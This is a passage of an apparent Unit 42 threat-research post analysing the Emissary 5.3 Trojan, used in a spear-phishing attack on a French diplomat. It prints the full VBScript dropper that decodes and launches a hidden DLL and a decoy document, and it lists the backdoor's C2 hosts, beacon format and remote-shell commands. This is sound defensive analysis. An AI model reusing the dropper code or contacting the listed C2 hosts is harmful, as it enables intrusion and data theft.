| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 | On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "cmd"," /c taskkill -f -im winword.exe ","","",0 wscript.sleep 3000 dim str dim L1 dim L2 dim Len dim infile dim outfile1 dim outfile2 infile = "C:\\Documents and Settings\\\<username\>\\Desktop\\\<malicious document name\>.doc" outfile1 = "C:\\Documents and Settings\\\<username\>\\Local Settings\\Application Data\\mm.dll" outfile2 = "C:\\Documents and Settings\\\<username\>\\Local Settings\\Application Data\\t.doc" L1= 78924 L2= 38912 size= 144893 offset1 = size-L1-L2 offset2 = size-L2 Len=0 str = ReadBinary (infile,L1,offset1) WriteBinary outfile1, str str = ReadBinary (infile,L2,offset2) WriteBinary outfile2, str Function ReadBinary(FileName,length,offset) Dim Buf(), I With CreateObject("ADODB.Stream") .Mode = 3: .Type = 1: .Open: .LoadFromFile FileName : .Position = offset Len =length -1 ReDim Buf(Len) For I = 0 To Len: if(I=0) then Buf(I)=(AscB(.Read(1))) else if ((I mod 2)=0) then Buf(I)=(AscB(.Read(1)) xor AscB(chr(65))) else Buf(I)=(AscB(.Read(1)) xor AscB(chr(67))) end if Next .Close End With ReadBinary = Buf End Function Sub WriteBinary(FileName, Buf) Dim I, aBuf, Size, bStream Size = UBound(Buf): ReDim aBuf(Size \\ 2) For I = 0 To Size - 1 Step 2 aBuf(I \\ 2) = ChrW(Buf(I + 1) \* 256 + Buf(I)) Next If I = Size Then aBuf(I \\ 2) = ChrW(Buf(I)) aBuf=Join(aBuf, "") Set bStream = CreateObject("ADODB.Stream") bStream.Type = 1: bStream.Open With CreateObject("ADODB.Stream") .Type = 2 : .Open: .WriteText aBuf .Position = 2: .CopyTo bStream: .Close End With bStream.SaveToFile FileName, 2: bStream.Close Set bStream = Nothing End Sub set shell=createobject("Shell.Application") shell.ShellExecute "C:\\Documents and Settings\\\<username\>\\Local Settings\\Application Data\\t.doc" shell.ShellExecute "rundll32","""C:\\Documents and Settings\\\<username\>\\Local Settings\\Application Data\\mm.dll"",Setting" Set xa = CreateObject("Scripting.FileSystemObject") If xa.FileExists("C:\\Documents and Settings\\\<username\>\\Local Settings\\Application Data\\ss.vbs") Then Set xb = xa.GetFile("C:\\Documents and Settings\\\<username\>\\Local Settings\\Application Data\\ss.vbs") xb.Delete End If |

*Figure 5 VBScript within ss.vbs responsible for extracting and running the payload and decoy*

# Emissary 5.3 Analysis

The payload of this attack is a Trojan that we track with the name Emissary. This Trojan is related to the Elise backdoor described in the [Operation Lotus Blossom](https://blog.paloaltonetworks.com/2015/06/operation-lotus-blossom/) report. Both Emissary and Elise are part of a malware group referred to as "LStudio", which is based on the following debug strings found in Emissary and Elise samples:

d:\\lstudio\\projects\\worldclient\\emissary\\Release\\emissary\\i386\\emissary.pdb

d:\\lstudio\\projects\\lotus\\elise\\Release\\EliseDLL\\i386\\EliseDLL.pdb

There is code overlap between Emissary and Elise, specifically in the use of a common function to log debug messages to a file and a custom algorithm to decrypt the configuration file. The custom algorithm used by Emissary and Elise to decrypt their configurations use the "srand" function to set a seed value for the "rand" function, which the algorithm uses to generate a key. While the "rand" function is meant to generate random numbers, the malware author uses the "srand" function to seed the "rand" function with a static value. The static seed value causes the "rand" function to create the same values each time it is called and results in a static key to decrypt the configuration. The seed value is where the Emissary and Elise differ in their use of this algorithm, as Emissary uses a seed value of 1024 (as seen in Figure 6) and Elise uses the seed value of 2012.

![fig6](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/12/fig6-1.png)

*Figure 6 Custom algorithm in Emissary using 'srand' and 'rand' with 1024 as a seed value*

While these two Trojans share code, we consider Emissary and Elise separate tools since their configuration structure, command handler and C2 communications channel differ. The Emissary Trojan delivered in this attack contains the components listed in Table 1. At a high level, Emissary has an initial loader DLL that extracts a configuration file and a second DLL containing Emissary's functional code that it injects into Internet Explorer.

|----------------------------------|--------------------------------------|--------------------|
| **MD5**                          | **Path**                             | **Description**    |
| 06f1d2be5e981dee056c231d184db908 | %APPDATA%\\LocalData\\ishelp.dll     | Loader             |
| 6278fc8c7bf14514353797b229d562e8 | %APPDATA%\\LocalData\\A08E81B411.DAT | Emissary Payload   |
| e9f51a4e835929e513c3f30299567abc | %APPDATA%\\LocalData\\75BD50EC.DAT   | Configuration file |
| varies                           | %TEMP%\\000A758C8FEAE5F.TMP          | Log file           |

*Table 1 Dropped files associated with Emissary Trojan seen in attack on French Ministry of Foreign Affairs*

The loader Trojan named "ishelp.dll" had an original name of "Loader.dll", which will extract the Emissary payload from a resource named "asdasdasdasdsad" and write it to a file named "A08E81B411.DAT". The loader will then write an embedded configuration to a file named "75BD50EC.DAT". The loader Trojan creates a mutex named "_MICROSOFT\_LOADER\_MUTEX_" and finishes by injecting the Emissary DLL in "A08E81B411.DAT" into a newly spawned Internet Explorer process.

The Emissary Trojan runs within the Internet Explorer process. It begins by reading and decrypting its configuration file, which has the following structure:  
struct emissary\_config { WORD emissary\_version\_major; WORD emissary\_version\_minor; CHAR\[36\] GUID\_for\_sample; WORD Unknown1; CHAR\[128\] Server1; CHAR\[128\] Server2; CHAR\[128\] Server3; CHAR\[128\] CampaignName; CHAR\[550\] Unknown2; WORD Delay\_interval\_seconds; };

|----------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 | struct emissary\_config { WORD emissary\_version\_major; WORD emissary\_version\_minor; CHAR\[36\] GUID\_for\_sample; WORD Unknown1; CHAR\[128\] Server1; CHAR\[128\] Server2; CHAR\[128\] Server3; CHAR\[128\] CampaignName; CHAR\[550\] Unknown2; WORD Delay\_interval\_seconds; }; |

We decrypted and parsed the configuration file that accompanied the payload used in this attack, which resulted in the following settings:

Version: 5.3  
GUID: ba87c1c5-f71c-4a8b-b511-07aa113d9103  
C2 Server 1: http://ustar5.PassAs\[.\]us/default.aspx  
C2 Server 2: http://203.124.14.229/default.aspx  
C2 Server 3: http://dnt5b.myfw\[.\]us/default.aspx  
Campaign Code: UPG-ZHG-01  
Sleep Delay: 300

After decrypting the configuration file, Emissary interacts with its command and control (C2) servers using HTTP or HTTPS, depending on the protocol specified in the configuration file. The initial network beacon sent from Emissary to its C2 server, seen in Figure 7, includes a Cookie field that contains a "GUID", "op" and "SHO" field. The GUID field is a unique identifier for the compromised system that is obtained directly from the configuration file. The op field has a value of "101", which is a static value that represents the initial network beacon. The SHO field contains the external IP address of the infected system, which Emissary obtains from a legitimate website "showip.net", specifically parsing the website's response for '\<input id="checkip" type="text" name="check\_ip" value=', which contains the IP address of the system.

![fig7](http://blog.paloaltonetworks.com/wp-content/uploads/2015/12/fig7-500x120.png)

*Figure 7 Network beacon sent from Emissary Trojan to C2 server*

The C2 server response to this beacon (seen in Figure 8) will contain a header field called "Set-Cookie", which contains a value of "SID". The SID value is base64 encoded and encrypted using a rolling XOR algorithm, which once decoded and decrypted contains a 36-character GUID value. The Emissary Trojan will use this GUID value provided by the C2 server as an encryption key that it will use to encrypt data sent in subsequent network communications.

![fig8](http://blog.paloaltonetworks.com/wp-content/uploads/2015/12/fig8-500x174.png)

*Figure 8 C2 response to Emissary beacon*

The C2 server provides commands to the Trojan as a three digit numeric string within the data portion of the HTTP response (in the form of "op=\<command\>"), which the Emissary Trojan will decrypt and compare to a list of commands within its command handler. The command handler function within the Emissary Trojan supports six commands, as seen in Table 2.

|-------------|-------------------------------------------|
| **Command** | **Description**                           |
| 102         | Upload a file to the C2 server.           |
| 103         | Executes a specified command.             |
| 104         | Download file from the C2 server.         |
| 105         | Update configuration file.                |
| 106         | Create a remote shell.                    |
| 107         | Updates the Trojan with a new executable. |

*Table 2 Command handler within Emissary version 5.3*

If the command issued from the C2 server does not match the one listed in the Trojan saves the message "unkown:%s" to the log file. The command set available within Emissary allows the threat actors backdoor access to a compromised system. Using this access, the threat actors can exfiltrate data and carry out further activities on the system, including interacting directly with the system's command shell and downloading and executing additional tools for further functionality.

# Threat Infrastructure

The infrastructure associated with the Emissary C2 servers used in this attack includes ustar5.PassAs\[.\]us, 203.124.14.229 and dnt5b.myfw\[.\]us. The infrastructure is rather isolated as the only overlap in domains includes appletree.onthenetas\[.\]com. The overlap, as seen in Figure 9 involves two IP addresses that during the same time frame resolved both the appletree.onthenetas\[.\]com domain and the Emissary C2 domain of ustar5.PassAs\[.\]us. The other C2 domain used by this Emissary payload, specifically dnt5b.myfw\[.\]us currently resolves to the 127.0.0.1. This provides another glimpse into TTPs for these threat actors, as it suggests that the threat actors set the secondary C2 domains to resolve to the localhost IP address to avoid network detection and change this to a routable IP address when they need the C2 server operational. Additionally, while this infrastructure does not overlap with that used in Operation Lotus Blossom, that also fits with the TTPs. In each case, the threat actors used separate infrastructure for different targets, another way to help avoid detection.

![fig9](http://blog.paloaltonetworks.com/wp-content/uploads/2015/12/fig9-500x679.png)

*Figure 9 Infrastructure associated with Emissary Trojan*

# Conclusion

APT threat actors, most likely nation state-sponsored, targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan. It is entirely possible the diplomat was truly invited to the conference, or at least would not have been surprised by the invitation, adding to the likelihood the attachment would have been opened. The actors were attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan, specifically version 5.3.

The Emissary Trojan is related to the Elise malware used in [Operation Lotus Blossom](https://blog.paloaltonetworks.com/2015/06/operation-lotus-blossom/), which was an attack campaign on targets in Southeast Asia, in many cases also with official looking decoy documents that do not appear to have been available online. Additionally, the targeting of a French diplomat based in Taipei, Taiwan aligns with previous targeting by these actors, as does the separate infrastructure. Based on the targeting and lures, Unit 42 assesses that the threat actors' collection requirements not only include militaries and government agencies in Southeast Asia, but also nations involved in diplomatic and trade agreements with them.

# Indicators

**Related Hashes** 748feae269d561d80563eae551ef7bfd -書面報名表格.doc  
9fd6f702763a9840bd1b3a898eb9c62d -蔡英文柯建銘全國科技後援會邀請函.doc06f1d2be5e981dee056c231d184db908 - ishelp.dll  
6278fc8c7bf14514353797b229d562e8 - A08E81B411.DAT  
e9f51a4e835929e513c3f30299567abc - 75BD50EC.DAT

**Command and Control** 203.124.14.229ustar5.PassAs\[.\]us  
appletree.onthenetas\[.\]com  
dnt5b.myfw\[.\]us
Back to top

### Tags

* [Email](https://unit42.paloaltonetworks.com/tag/email/ "email")
* [Emissary](https://unit42.paloaltonetworks.com/tag/emissary/ "Emissary")
* [Lotus Blossom](https://unit42.paloaltonetworks.com/tag/lotus-blossom/ "Lotus Blossom")
* [Spear Phishing](https://unit42.paloaltonetworks.com/tag/spear-phishing/ "Spear Phishing")  
  [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research") [Next: iOS Trojan "TinyV" Attacks Jailbroken Devices](https://unit42.paloaltonetworks.com/ios-trojan-tinyv-attacks-jailbroken-devices/ "iOS Trojan “TinyV” Attacks Jailbroken Devices")

### Related Articles

* [Threat Brief: Recruiting Scheme Impersonating Palo Alto Networks Talent Acquisition Team](https://unit42.paloaltonetworks.com/phishing-attackers-pose-as-panw-recruiters/ "article - table of contents")
* [Boggy Serpens Threat Assessment](https://unit42.paloaltonetworks.com/boggy-serpens-threat-assessment/ "article - table of contents")
* [Recent Jailbreaks Demonstrate Emerging Threat to DeepSeek](https://unit42.paloaltonetworks.com/jailbreaking-deepseek-three-techniques/ "article - table of contents")

## Related Malware Resources

![Pictorial representation of post-exploitation identity misuse in SPIFFE/SPIRE. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/12_Security-Technology_Category_1920x900-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 10, 2026 [#### The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/)

* [API](https://unit42.paloaltonetworks.com/tag/api/ "API")

* [Cryptographic](https://unit42.paloaltonetworks.com/tag/cryptographic/ "cryptographic")

* [JSON](https://unit42.paloaltonetworks.com/tag/json/ "JSON")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/ "The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE")  
  ![Pictorial representation of a pay-per-install threat group campaign prodiving infection service for spreading malware. A close-up of a computer circuit board with a central microchip is depicted. Red digital data streams in the form of glowing binary numbers and arrows appear to flow in and out of the chip, symbolizing data processing and transfer. The scene is illuminated with a futuristic blue and red glow.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/04_Malware_Category_1920x900-6-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 9, 2026 [#### Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/)

* [ARKTunnel](https://unit42.paloaltonetworks.com/tag/arktunnel/ "ARKTunnel")

* [C2](https://unit42.paloaltonetworks.com/tag/c2/ "C2")

* [CL-CRI-1171](https://unit42.paloaltonetworks.com/tag/cl-cri-1171/ "CL-CRI-1171")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/ "Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure")  
  ![Pictorial representation of attackers using AI tools to target Latin American organizations. A vibrant cityscape with silhouettes of numerous people walking along a bustling street. The scene is illuminated by bright urban lights and digital-like particles, creating a dynamic and futuristic atmosphere.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/AdobeStock_768915868-2-1-786x373.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 3, 2026 [#### Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/)

* [Agentic AI](https://unit42.paloaltonetworks.com/tag/agentic-ai/ "Agentic AI")

* [ChatGPT](https://unit42.paloaltonetworks.com/tag/chatgpt/ "ChatGPT")

* [CL-CRI-1131](https://unit42.paloaltonetworks.com/tag/cl-cri-1131/ "CL-CRI-1131")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/ "Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America")  
  ![Pictorial representation of vishing campaigns in Microsoft Teams. A digital image of a skull formed by blue binary code on a black background, with scattered ones and zeros and digital noise, symbolizes how stealthy prompt injection attacks can exploit AI logic to bypass security controls.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/01_Malware_Category_1920x900-5-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 31, 2026 [#### Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/)

* [Cloaked Ursa](https://unit42.paloaltonetworks.com/tag/cloaked-ursa/ "Cloaked Ursa")

* [Entra ID](https://unit42.paloaltonetworks.com/tag/entra-id/ "Entra ID")

* [Microsoft Teams](https://unit42.paloaltonetworks.com/tag/microsoft-teams/ "Microsoft Teams")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/ "Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams")  
  ![Pictorial representation of AI-enabled malware. A vibrant digital interface displaying various icons and graphs, resembling a futuristic network or data analysis dashboard. The scene is illuminated with glowing lights and patterns.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/AdobeStock_1270203474-2-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 25, 2026 [#### The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/)

* [Backdoor](https://unit42.paloaltonetworks.com/tag/backdoor/ "backdoor")

* [Bitcoin](https://unit42.paloaltonetworks.com/tag/bitcoin/ "Bitcoin")

* [DLL hijacking](https://unit42.paloaltonetworks.com/tag/dll-hijacking/ "DLL hijacking")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/ "The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution")  
  ![Pictorial representation of identity abuse through trusted communication channels. Close-up view of a digital screen displaying a glitched and pixelated image of a skull-like shape.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/02_Malware_Category_1920x900-2-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 20, 2026 [#### Identity Abuse Through Trusted Communication Channels](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/)

* [Authentication](https://unit42.paloaltonetworks.com/tag/authentication/ "authentication")

* [Identity theft](https://unit42.paloaltonetworks.com/tag/identity-theft/ "identity theft")

* [Malware](https://unit42.paloaltonetworks.com/tag/malware/ "malware")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/ "Identity Abuse Through Trusted Communication Channels")  
  ![Pictorial representation of Kimwolf botnet malware family. Digital screen with a warning sign reading "Malware." The background features lines of computer code and graphics, creating a sense of cybersecurity threat.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/07_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 11, 2026 [#### Kimwolf v7: An Evolution of the Kimwolf Botnet](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/)

* [Android APK](https://unit42.paloaltonetworks.com/tag/android-apk/ "Android APK")

* [Ethereum](https://unit42.paloaltonetworks.com/tag/ethereum/ "Ethereum")

* [HTTP](https://unit42.paloaltonetworks.com/tag/http/ "HTTP")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/ "Kimwolf v7: An Evolution of the Kimwolf Botnet")  
  ![Pictorial representatiom pf Aeternum's blockchain C2. A close-up of a computer circuit board with a central microchip is depicted. Red digital data streams in the form of glowing binary numbers and arrows appear to flow in and out of the chip. The scene is illuminated with a futuristic blue and red glow.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/04_Malware_Category_1920x900-4-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 10, 2026 [#### The Permanent Threat: Analyzing Aeternum's Blockchain-Based C2 Operations and Communications](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/)

* [Aeternum](https://unit42.paloaltonetworks.com/tag/aeternum/ "Aeternum")

* [Infection chain](https://unit42.paloaltonetworks.com/tag/infection-chain/ "infection chain")

* [JSON](https://unit42.paloaltonetworks.com/tag/json/ "JSON")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/ "The Permanent Threat: Analyzing Aeternum’s Blockchain-Based C2 Operations and Communications")  
  ![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/) August 6, 2026 [#### ChainDrop: Inside a Self-Propagating npm Worm](https://unit42.paloaltonetworks.com/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/tag/blockchain/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/tag/claude-code/ "Claude code")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/chaindrop-npm-worm-analysis/ "ChainDrop: Inside a Self-Propagating npm Worm")  
  ![Pictorial representation of Token-jacking. A person types on a laptop with multiple digital interface elements projected, including an "AI" icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/AdobeStock_1246251272-2-786x369.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 6, 2026 [#### Token Jacking: Cybercriminals Could Be Stealing Your AI Resources](https://unit42.paloaltonetworks.com/ai-token-jacking/)

* [AI API](https://unit42.paloaltonetworks.com/tag/ai-api/ "AI API")

* [AI gateway](https://unit42.paloaltonetworks.com/tag/ai-gateway/ "AI gateway")

* [API keys](https://unit42.paloaltonetworks.com/tag/api-keys/ "API keys")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-token-jacking/ "Token Jacking: Cybercriminals Could Be Stealing Your AI Resources")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/unit42-footer-subscribe-desktop.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Get updates from Unit 42

## Peace of mind comes from staying ahead of threats. Subscribe today.

Your Email

Subscribe for email updates to all Unit 42 threat research.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use "Terms of Use") and acknowledge our [Privacy Statement.](https://www.paloaltonetworks.com/legal-notices/privacy "Privacy Statement")

This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.

Invalid captcha!
Subscribe ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security)

* [Secure AI by Design](https://www.paloaltonetworks.com/ai-security)

* [Prisma AIRS](https://www.paloaltonetworks.com/ai-security/prisma-airs)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/ot-security-solution)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase)

* [Prisma SASE](https://www.paloaltonetworks.com/sase)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam)

* [Next-Generation Identity Security](https://www.paloaltonetworks.com/idira)

* [Privileged Access Management](https://www.paloaltonetworks.com/idira/human/privileged-access-management)

* [Identity and Access Management](https://www.paloaltonetworks.com/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.com/idira/human/endpoint-privilege-manager)

* [Identity Governance](https://www.paloaltonetworks.com/idira/human/identity-governance)

* [Workforce Password Management](https://www.paloaltonetworks.com/idira/human/workforce-password-management)

* [Agentic Identities](https://www.paloaltonetworks.com/idira/agentic)

* [Secrets Management](https://www.paloaltonetworks.com/idira/machine/secrets-management)

* [Unified Secrets Governance](https://www.paloaltonetworks.com/idira/machine/unified-secrets-governance)

* [Application Credentials Delivery](https://www.paloaltonetworks.com/idira/machine/application-credentials-delivery)

* [Vendor Privileged Access](https://www.paloaltonetworks.com/idira/human/vendor-privileged-access)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42)

* [Prepare for Emerging Risks](https://www.paloaltonetworks.com/unit42/frontier-ai-defense)

* [Strengthen Your Defenses](https://www.paloaltonetworks.com/unit42/strengthen-your-defenses)

* [Build Your Security Strategy](https://www.paloaltonetworks.com/unit42/build-your-security-strategy)

* [Understand the Adversary](https://www.paloaltonetworks.com/unit42/threat-intelligence)

* [Respond to a Cyber Attack](https://www.paloaltonetworks.com/unit42/respond)  
  Company

* [About Us](https://www.paloaltonetworks.com/about-us)

* [Careers](https://jobs.paloaltonetworks.com/en/)

* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales)

* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [Customers](https://www.paloaltonetworks.com/customers)

* [Investor Relations](https://investors.paloaltonetworks.com/)

* [Location](https://www.paloaltonetworks.com/about-us/locations)

* [Newsroom](https://www.paloaltonetworks.com/company/newsroom)  
  Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/)

* [Communities](https://www.paloaltonetworks.com/communities)

* [Content Library](https://www.paloaltonetworks.com/resources)

* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia)

* [Event Center](https://events.paloaltonetworks.com/)

* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)

